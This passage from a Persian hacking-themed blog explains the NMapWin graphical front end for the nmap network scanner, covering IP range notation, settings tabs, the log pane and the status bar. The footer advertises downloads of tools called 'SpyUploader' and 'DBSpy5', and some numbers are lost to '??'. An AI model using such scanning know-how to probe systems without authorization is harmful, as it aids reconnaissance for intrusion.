اگر قرار باشد بيش از يک ip وارد شود، اين کار را ميتوان به صورتهاي مختلف انجام داد. مثلا: *.*.192.130 يعني تمام ip هايي که با 192.130 شروع ميشوند ولي دو عدد بعدي هرچيزي ميتواند باشد. و نوشتن به صورت 15-192.130.120.12 يعني عدد آخري ميتواند از ?? تا ?? باشد.
?- Option Folder :
اين قسمت در واقع محل تنظيمات است و به کمک آن مشخص ميکنيم که از برنامه ميخواهيم که چهکاري انجام دهد که مفصلا در موردش صحبت خواهم کرد. در اين قسمت، برگههايي با نامهاي Option , Discover , Scan , ... وجود دارد.
?- Log Output :
محل ظاهر شدن نتايج است. در حالتي که اسکن شروع نشده باشد، خالي است.
?- Status bar :
پايينترين بخش پنجره برنامه است و دو بخش مهم دارد:
قسمت سمت چپ نشان ميدهد که اگر بخواهيم در nmap همين کار رو انجام بديم، چه سويچهايي را بايد بکار بريم ( دقت کنيد که nmap برخلاف NMapWin گرافيکي نيست ). هر تغييري که در قسمت Option Folder اعمال کنيم، در اين قسمت تغييري را مشاهده ميکنيم و توصيه ميکنم که حتما به اين قسمت توجه ويژهاي داشته باشيد.
اما در سمت راست آن، يک مربع کوچک مشاهده ميشود که ميتواند به رنگهاي سبز يا قرمز باشد. سبز يعني اينکه برنامه آماده براي اجراي دستورات شماست و قرمز يعني در حال انجام دستورات وارد شده است و فعلا دستور جديد نميپذيرد.
|
+| نوشته شده توسط سعید هکر مشهد در ساعت
|
در مورخه ۲۲/۵/۸۶ ساعت
این وبلاگ یکی از وبلاگ های
بهتره شما هم یه سری بزنین.راستش من دوست دارم در وبلاگم
دانلود SpyUploader 
دانلود کن DBSpy5 را در 10 ثانیه
دانلود کن DBSpy5 در 10 ثانیه
